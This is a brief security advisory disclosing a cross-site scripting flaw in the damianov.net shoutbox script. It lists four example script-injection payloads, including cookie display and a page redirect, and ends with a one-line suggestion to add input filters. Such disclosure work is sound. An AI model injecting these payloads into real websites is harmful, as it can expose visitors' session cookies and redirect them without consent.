damianov.net Shoutbox XSS Vulnerability

Please view the original advisory here.

The free shoutbox script from damianov.net suffers from a XSS vulnerability.

Injecting arbitrary HTML and Java Script code is possible while adding a new
shout, no matter if HTML is allowed in the shoutsettings.php or not.

#1 Example: <SCRIPT src=some-script.js></SCRIPT>
#2 Example: <SCRIPT>alert("XSS")</SCRIPT>
#3 Example: <SCRIPT>alert(document.cookie)</SCRIPT>
#4 Example: <script>document.location.href="http://www.google.de"</script>

Solution: Simply edit the code and add filters.